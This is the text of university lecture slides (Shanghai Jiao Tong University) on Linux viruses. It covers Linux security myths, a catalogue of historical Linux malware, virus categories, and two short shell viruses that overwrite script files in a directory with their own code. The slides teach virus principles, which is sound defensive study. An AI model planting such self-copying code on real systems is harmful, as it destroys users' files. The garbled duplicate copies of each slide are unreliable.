上海交通大学：《计算机病毒原理》课程教学资源（PPT课件讲稿）第七章 Linux病毒技术

Linux病毒技术 上海交通大学信息安全工程学院

Linux病毒技术 上海交通大学信息安全工程学院

本章的学习目标: 了解 Linux的安全问题 掌握 Linux病毒的概念 掌握 Linux下的脚本病毒 熟悉ELF文件格式 掌握ELF病毒感染方法

• 本章的学习目标： – 了解Linux的安全问题 – 掌握Linux病毒的概念 – 掌握Linux下的脚本病毒 – 熟悉ELF文件格式 – 掌握ELF病毒感染方法

Linux安全吗? 个最大的误区就是很多高性能的安全 操作系统可以预防计算机病毒。 另一个误区就是认为 Linux系统尤其可以 防止病毒的感染,因为 Linux的程序都来 自于源代码,不是二进制格式 第三个误区就是认为 Linux系统是绝对安 全的,因为它具有很多不同的平台,而 且每个版本的 Linux系统有很大的不一样

Linux安全吗？ • 一个最大的误区就是很多高性能的安全 操作系统可以预防计算机病毒。 • 另一个误区就是认为Linux系统尤其可以 防止病毒的感染，因为Linux的程序都来 自于源代码，不是二进制格式。 • 第三个误区就是认为Linux系统是绝对安 全的，因为它具有很多不同的平台，而 且每个版本的Linux系统有很大的不一样

Linux病毒列表 Slapper The most dangerous Linux worm; it's network-aware and in August 2002 it exploited a flaw in Openssllibraries in Apache servers with OpenSsl enabled Bliss: Also a well-known bug, it infects ELF executables, locating binaries with write access and overwrites those with its own code Staog: Considered the first Linux virus, it infects ELF executables Typot: A Linux Trojan that does distributed port scanning, generating TCP packets with a window size of 55808 Mydoom: Windows worm have network propagation and process termination capabilities to launch a denial of service(Dos)attack on Www.sco.com

Linux病毒列表 • Slapper:The most dangerous Linux worm; it's network-aware and in August 2002 it exploited a flaw in OpenSSL libraries in Apache servers with OpenSSL enabled. • Bliss: Also a well-known bug, it infects ELF executables, locating binaries with write access and overwrites those with its own code. • Staog: Considered the first Linux virus, it infects ELF executables. • Typot: A Linux Trojan that does distributed port scanning, generating TCP packets with a window size of 55808. • Mydoom : Windows worm have network propagation and process termination capabilities to launch a denial of service (DoS) attack on www.sco.com

TNF: ADDoS agent Makes ICMP flood, SYN flood, UDP flood and Smurf attacks. It also has the capability of installing a root shell onto the affected system R16.A: Delete file in the current directory. Overwirte/bin/cp /bin/s Create /usr/SEXLOADER. /usr/TMPO01NOT RAMEN: The first virus in linux Overwrite all index html in the system Add two ftp account"anonymous"and"ftp"in the system. Add itselfs script in /etc/rc. d/rc sysinit rpc statd(port 11 1/udp), wu-ftpd (port2 1/tcp), LPrng(port515) LINDOSE. A: A rare cross-platform scourge, able to jump Windows PE and Linux elF executables. It's a proof-of-concept worm and has not hit the wild

• TNF： A DDoS agent.Makes ICMP flood, SYN flood, UDP flood, and Smurf attacks. It also has the capability of installing a “root shell” onto the affected system. • R16.A: Delete file in the current directory.Overwirte /bin/cp, /bin/ls. Create /usr/SEXLOADER, /usr/TMP001.NOT. • RAMEN: The first virus in Linux. Overwrite all index.html in the system. Add two ftp account “anonymous" and "ftp” in the system. Add itself’s script in /etc/rc.d/rc.sysinit.rpc.statd (port 111/udp ) , wu-ftpd (port21/tcp), LPRng (port 515) • LINDOSE.A: A rare cross-platform scourge, able to jump Windows PE and Linux ELF executables. It's a proof-of-concept worm and has not hit the wild

MSTREAM MST: A DDoS agent. It will open TCP port 6732 and UDP port 9325 Create master and server files ADORE.A: A internet worm. Overwrite /bin/ps. VExecutes ICMP, and opens port 65535. BIND, wu-ftpd, rpc statd, Ipd CHEESE.A: Include""shell script, ChEese perl script, and PSM ELF. Shell script GO runs perl script CHEESE. Delete all/bin/sh in /etc/inetd. conf close inetd QUASI: It will infect elF files in the current directory. It has no destructiveness PASS: It is writed by Gnu C. It will change Unix shell

• MSTREAM.MST : A DDoS agent. It will open TCP port 6732 and UDP port 9325. Create master and server files. • ADORE.A: A internet worm. Overwrite /bin/ps.VExecutes ICMP, and opens port 65535. BIND, wu-ftpd, rpc.statd, lpd. • CHEESE.A: Include "GO" shell script, CHEESE“ perl script, and “PSM” ELF.shell script GO runs perl script CHEESE. Delete all /bin/sh in /etc/inetd.conf. Close inetd. • QUASI: It will infect ELF files in the current directory. It has no destructiveness. • PASS: It is writed by GNU C. It will change Unix shell

Linux病毒分类 第一种:Shel脚本病毒 第二种:蠕虫病毒 第三种:欺骗库函数 第四种:内核级的传播 第五种:与平台兼容的病毒

Virus Threats on Linux Environment Triple Linux病毒分类 • 第一种: Shell脚本病毒 • 第二种: 蠕虫病毒 • 第三种: 欺骗库函数 • 第四种: 内核级的传播 • 第五种: 与平台兼容的病毒

Linux系统下的脚本病毒 she不同的 Linux系统上面的差别很小。 Shel1单易学

Linux系统下的脚本病毒 • shell在不同的Linux系统上面的差别很小。 • Shell简单易学

第一,最原始的shel病毒 #shellvirus l#f for file in infect/k cp so Sfile done

第一，最原始的shell病毒。 • #shellvirus I# • for file in ./infect/* • do • cp $0 $file • done

第二,一个简单的Shel病毒 # shellyirusⅡ# for file in /infect/* if test -f$fie#判断是否为文件 if test-x Sfile #判断是否可执行 · if test-w$fle #判断是否有写权限 if grep- s sh Sfile>mmm#判断是否为脚本文件 cp $O Sfile #覆盖当前文件 ffff done rm mmm -f

第二，一个简单的Shell病毒 • #shellvirus II# • for file in ./infect/* • do • if test -f $file #判断是否为文件 • then • if test -x $file #判断是否可执行 • then • if test -w $file #判断是否有写权限 • then • if grep –s sh $file > .mmm #判断是否为脚本文件 • then • cp $0 $file #覆盖当前文件 • fi • fi • fi • fi • done • rm .mmm -f